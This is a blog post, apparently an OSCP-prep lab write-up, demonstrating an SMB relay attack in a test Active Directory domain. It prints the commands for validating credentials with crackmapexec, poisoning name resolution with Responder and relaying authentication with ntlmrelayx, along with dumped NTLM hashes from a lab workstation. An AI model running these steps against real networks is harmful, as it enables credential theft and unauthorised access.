Active Directory CORPORATIVE.domain.local Series[II|] : SAMBARelay attack dump NTLM Hashes

 Hi everyone,

So far so good, i hope that you 've read my last post on reoadtoOSCP blog of Active Directory series[II], In that post i described the architecture environment that we are going to use during this series[XX] of attacks in our local corporate domian.

The complete attack process is defined step by step on the previous image, but know that not  everibody can understand the design without an explication. You could understand the attack idea in the most high level and simply diagram:

Prerequisites:

1.   In order to perform this attack successfully the powned user on the previous post Active Directory series[II] (CORPORATIVE\worker2), shall be logged on the  WKS-002.

 

 

2. The powned user too, shall has administration privileges on local environment of WKS-001. 

 

Validate the admin rigths:

 crackmapexec smb 10.0.2.0/24 -u "worker2" -p "Passw0rd1"

SMB         10.0.2.15       445    WKS-001          [*] Windows 10.0 Build 16299 x64 (name:WKS-001) (domain:CORPORATIVE.DOMAIN.local) (signing:False) (SMBv1:False)

SMB         10.0.2.16       445    WKS-002          [*] Windows 10.0 Build 19041 x64 (name:WKS-002) (domain:CORPORATIVE.DOMAIN.local) (signing:False) (SMBv1:False)

SMB         10.0.2.17       445    CORPORATIVE-DOM  [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DOMAIN.local) (signing:True) (SMBv1:True)

SMB         10.0.2.15       445    WKS-001          [+] CORPORATIVE.DOMAIN.local\worker2:Passw0rd1 (Pwn3d!)

SMB         10.0.2.16       445    WKS-002          [+] CORPORATIVE.DOMAIN.local\worker2:Passw0rd1 

SMB         10.0.2.17       445    CORPORATIVE-DOM  [+] CORPORATIVE.DOMAIN.local\worker2:Passw0rd1 

DEVELOP ATTACK STEP 1:

SMBRelay over NTLM:

1. The user worker2 logged on WKS-002, try to access to share resource.

2. The attacker machine poisoned the response to this request and redirect to perform authentication with ntlmrelayx on the local attacker machine service.

3. After this authentication the attacker could obtain the NTLM hashes, on stored on the local WKS-002.

Prepare Attacker machine:

Reponder.py tool without smb and http feature enable:

    sudo python3 Responder.py -I eth0 -rdw 

ntlmrelayx tool on the attacker machine for smb authentication:

kali@kali:~$ sudo python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf targets.txt -smb2support

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Protocol Client SMTP loaded..

[*] Protocol Client HTTP loaded..

[*] Protocol Client HTTPS loaded..

[*] Protocol Client LDAP loaded..

[*] Protocol Client LDAPS loaded..

[*] Protocol Client IMAP loaded..

[*] Protocol Client IMAPS loaded..

[*] Protocol Client MSSQL loaded..

[*] Protocol Client SMB loaded..

[*] Running in relay mode to hosts in targetfile

[*] Setting up SMB Server

[*] Setting up HTTP Server

Perform attack and obtain DUMP of NTLM Hash:

The user worker 2 on WKS-002 try to  access a shere directory that not exist or is unabailable:

Now our Responder listen and poisoned the response for this request, in this response the victim1 server (WKS-002) is redirected to ntlmelayx for authentication process:

Dump the hshes:

NTLM hashes:

Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a594f883e7a118ead15dccd70ae3c73f:::

f0ns1:1001:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::

And this is all for the this attack of Active directory, I hope that you enjoy with my third windows entry and you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.

with kind regards, f0ns1